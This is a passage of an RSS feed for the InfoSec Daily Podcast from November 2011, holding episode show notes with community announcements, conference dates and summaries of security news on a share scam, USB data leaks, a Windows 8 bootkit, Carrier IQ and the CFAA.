<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At this point, I don&#39;t see how any SOPA/PIPA supporters can still claim that the concerns over DNS blocking are unfounded. When you even have a major national lab saying that it&#39;s a bad idea, won&#39;t work and will be bad for online security&#8230; can the MPAA still respond with nothing more detailed than &quot;we disagree&quot; (which was the MPAA&#39;s actual statement at the hearing when challenged about the security problems associated with DNS blocking).</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-526-pre-ipo-bust-who-is-michael-findfriendz-com-water-plants-attacked-compromised-certs-sopa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3171/0/infosec-daily-podcast-episode-526.mp3" length="18427756" type="audio/mpeg" />
		<itunes:duration>0:38:20</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 526 for November 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 526 for November 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.theregister.co.uk/2011/11/18/pre_ipo_share_scam_facebook_twitter/
	The US Securities and Exchange Commission has closed down an investment scam that was touting pre-IPO shares in Facebook, Twitter, Zynga and Groupon.
	The SEC alleges that Florida resident John Mattera and others set up a new hedge fund named The Praetorian Global Fund. The Commission alleged that the suspects had claimed to potential investors that they, and other entities, had tens of millions of dollars worth of shares in the tech firms before their initial public offering.
	Mattera and his partners Brad Van Siclen, David Howard, Joseph Almazon and John Arnold, allegedly encouraged the investors to part with their cash to be put into an escrow fund to purchase the shares when the time came, and the SEC said they had managed to bag $12m from investors all over the US in the last 15 months.
	According to the SEC, none of the individuals ever had any shares in the companies, which also included firms like Bloom Energy and Fisker Auto. The money that was supposed to be going into escrow was actually just going into the personal accounts of Mattera and Arnold, the SEC said.
	The Commission asserted that after Arnold had taken his cut, Mattera then grabbed the rest of the dosh to &#34;afford his lavish personal expenses&#34; and to pay the rest of the gang.
	&#8220;By conjuring up a seemingly prestigious hedge fund and touting the safety of an escrow agent, these men exploited investors&#8217; desire to get an inside track on a wave of hyped future IPOs,&#8221; George Canellos, director of the SEC&#8217;s New York office, said in a canned statement.
	&#8220;Even as investors believed their funds were sitting safely in escrow accounts, Mattera plundered those accounts to bankroll a lifestyle of private jets, luxury cars, and fine art.&#8221;
	The US attorney&#39;s office for the southern district of New York, which was carrying on a parallel investigation, has now filed criminal charges against Mattera and arrested him.
	The SEC is now looking for the courts to freeze the assets of all five men and eight different corporate entities listed in the complaint (PDF).
	Source(s): &#160;http://datalossdb.org/incidents/4985-57-721-usernames-and-clear-text-passwords-acquired-by-hacker-and-posted-on-internet
	http://www.ehackingnews.com/2011/11/social-network-site-findfriendzcom.html
	http://pastebin.com/uqw[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 525 &#8211; UnexplodedSecurityBombs, Win8 Bootkit,  The Rootkit of All Evil &amp; Illegal White Lies</title>
		<link>http://www.isdpodcast.com/episode-525-unexplodedsecuritybombs-win8-bootkit-the-rootkit-of-all-evil-illegal-white-lies</link>
		<comments>http://www.isdpodcast.com/episode-525-unexplodedsecuritybombs-win8-bootkit-the-rootkit-of-all-evil-illegal-white-lies#comments</comments>
		<pubDate>Fri, 18 Nov 2011 01:50:04 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3167</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 525 for November 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 525 for November 17, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theage.com.au/digital-life/computers/usb-keys-are-unexploded-security-bombs-in-companies-20111116-1nhqg.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theage.com.au/digital-life/computers/usb-keys-are-unexploded-security-bombs-in-companies-20111116-1nhqg.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BLEEDING Edge can imagine the consternation at Computershare, the Melbourne-based share registry company, when a Boston employee quit the company, allegedly after taking home a company notebook computer and &#8211; without authorisation &#8211; copying thousands of pages of highly sensitive and confidential documents to a USB flash drive.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A court in Boston has been told Computershare has been unable to track down the original USB drive, although the company has retrieved one of two USB devices still in the woman&#39;s possession.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although Bleeding Edge bought the world&#39;s first USB key, the Trek ThumbDrive, at a Melbourne PC show many years ago &#8211; it cost $350 for 32 megabytes of storage &#8211; and we have lost count of our subsequent USB purchases, we have always believed the initials don&#39;t actually stand for universal serial bus.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As far as we&#39;re concerned, a USB key is an unexploded security bomb, waiting to blow up in the user&#39;s face.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Business users should definitely consider changing user profiles to lock out USB access or deploy software to track inappropriate use and malware threats. But in the home or small business, those USB ports are simply too useful to deactivate.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In those environments, the threat is not so much the unauthorised transfer of data as the potential for losing many gigabytes of files with sensitive information that could be used to drain one&#39;s bank account or steal one&#39;s identity, or the unwitting transfer of malware.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Those threats also apply to business. According to magazine </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">InformationWeek</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, 70 per cent of businesses in the past two years have traced the loss of sensitive or confidential information to USB sticks. More than half those incidents were related to malware-infected devices that introduced malicious code to corporate networks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://thehackernews.com/2011/11/worlds-first-windows-8-bootkit-to-be.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thehackernews.com/2011/11/worlds-first-windows-8-bootkit-to-be.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is amazing how fast security measures are bypassed by hackers. it seems Windows 8 is now Malconed! Peter Kleissner has created the world&#39;s first Windows 8 Bootkit which is planned to be released in India at the International Malware Conference MalCon.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An independent programmer and security analyst, peter was working for an anti-virus company from 2008 to 2009 and was speaker at the Black Hat and Hacking at Random technical security conferences. While his main operating fields are Windows security and analysis of new malware, his recent Important projects include the development of the Stoned Bootkit, a research project to subvert the Windows security model.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bootkit is built upon the following broad parts:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infector</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bootkit</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Drivers</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Plugins (the payload)</span></p>
</li>
</ul>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And as put by peter, those parts are easy to split up in a criminal organization: Teams A-D are writing on the different parts. If you are doing it right, Team D (the payload writers) need no internal knowledge of the bootkit! Peter&#39;s research website: http://www.stoned-vienna.com/</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="text-align: justify; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As per the MalCon website, peter&#39;s travel is still not confirmed citing VISA issues, however, there are chances that the presentation may be done over the video or a speaker may step in on behalf of peter and release it at MalCon.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.xda-developers.com/android/the-rootkit-of-all-evil-ciq/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.xda-developers.com/android/the-rootkit-of-all-evil-ciq/</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And the spy and invasion of privacy saga continues, but this time XDA Recognized Developer TrevE seems to have hit the very core of most of what is happening with devices. You may recall from a few articles back that we started talking about something called CIQ or Carrier iQ. This is, essentially, a piece of software that is embedded into most mobile devices, not just Android but Nokia, Blackberry, and likely many more. According to TrevE, the software is installed as a rootkit software in the RAM of devices where it resides. This software basically is completely hidden from view and in it virtually invisible, and worst of all, rather complicated to kill (some devices more so than others and you will see why in a few minutes). This is given root like rights over the device, which means that it can do everything it pleases and you will have nothing to say about it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.zdnet.co.uk/news/compliance/2011/11/16/doj-seeks-to-outlaw-lying-on-social-networks-40094434/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.co.uk/news/compliance/2011/11/16/doj-seeks-to-outlaw-lying-on-social-networks-40094434/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US Department of Justice is defending computer hacking laws that make it a crime to use a fake name on Facebook or lie about your weight in an online dating profile at a site like Match.com.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a statement delivered on Tuesday to US Congress, the Justice Department argued that it must be able to prosecute violations of websites&#39; often-ignored, always-unintelligible &quot;terms of service&quot; policies. The law must allow &quot;prosecutions based upon a violation of terms of service or similar contractual agreement with an employer or provider,&quot; according to the Justice Department.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The law in question, the Computer Fraud and Abuse Act (CFAA), has been used by the Justice Department to prosecute a woman, Lori Drew, who used a fake MySpace account to verbally attack a 13-year old girl who then committed suicide. Because MySpace&#39;s terms of service prohibit impersonation, Drew was convicted of violating the CFAA. Her conviction was later thrown out.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s comments</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: This could make social engineering engagements especially difficult. &nbsp;Damn you </span><a href="http://en.wikipedia.org/wiki/Robin_Sage"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Robin Sage</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">!!</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-525-unexplodedsecuritybombs-win8-bootkit-the-rootkit-of-all-evil-illegal-white-lies/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3167/0/infosec-daily-podcast-episode-525.mp3" length="19188651" type="audio/mpeg" />
		<itunes:duration>0:39:56</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 525 for November 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 525 for November 17, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.theage.com.au/digital-life/computers/usb-keys-are-unexploded-security-bombs-in-companies-20111116-1nhqg.html
	BLEEDING Edge can imagine the consternation at Computershare, the Melbourne-based share registry company, when a Boston employee quit the company, allegedly after taking home a company notebook computer and &#8211; without authorisation &#8211; copying thousands of pages of highly sensitive and confidential documents to a USB flash drive.
	A court in Boston has been told Computershare has been unable to track down the original USB drive, although the company has retrieved one of two USB devices still in the woman&#39;s possession.
	Although Bleeding Edge bought the world&#39;s first USB key, the Trek ThumbDrive, at a Melbourne PC show many years ago &#8211; it cost $350 for 32 megabytes of storage &#8211; and we have lost count of our subsequent USB purchases, we have always believed the initials don&#39;t actually stand for universal serial bus.
	As far as we&#39;re concerned, a USB key is an unexploded security bomb, waiting to blow up in the user&#39;s face.
	Business users should definitely consider changing user profiles to lock out USB access or deploy software to track inappropriate use and malware threats. But in the home or small business, those USB ports are simply too useful to deactivate.
	In those environments, the threat is not so much the unauthorised transfer of data as the potential for losing many gigabytes of files with sensitive information that could be used to drain one&#39;s bank account or steal one&#39;s identity, or the unwitting transfer of malware.
	Those threats also apply to business. According to magazine InformationWeek, 70 per cent of businesses in the past two years have traced the loss of sensitive or confidential information to USB sticks. More than half those incidents were related to malware-infected devices that introduced malicious code to corporate networks.
	&#8230;
	Source: http://thehackernews.com/2011/11/worlds-first-windows-8-bootkit-to-be.html
	 
It is amazing how fast security measures are bypassed by hackers. it seems Windows 8 is now Malconed! Peter Kleissner has created the world&#39;s first Windows 8 Bootkit which is planned to be released in India at the International Malware Conference MalCon.
&#160;
An independent programmer and security analyst, peter was working for an anti-vir[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 524 &#8211; Deliberate Blundering, More BIND Lulz, Shiesty Nodes, TDSS &amp; Romanian Arrest</title>
		<link>http://www.isdpodcast.com/episode-524-deliberate-blundering-more-bind-lulz-shiesty-nodes-tdss-romanian-arrest</link>
		<comments>http://www.isdpodcast.com/episode-524-deliberate-blundering-more-bind-lulz-shiesty-nodes-tdss-romanian-arrest#comments</comments>
		<pubDate>Thu, 17 Nov 2011 01:48:13 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3163</guid>
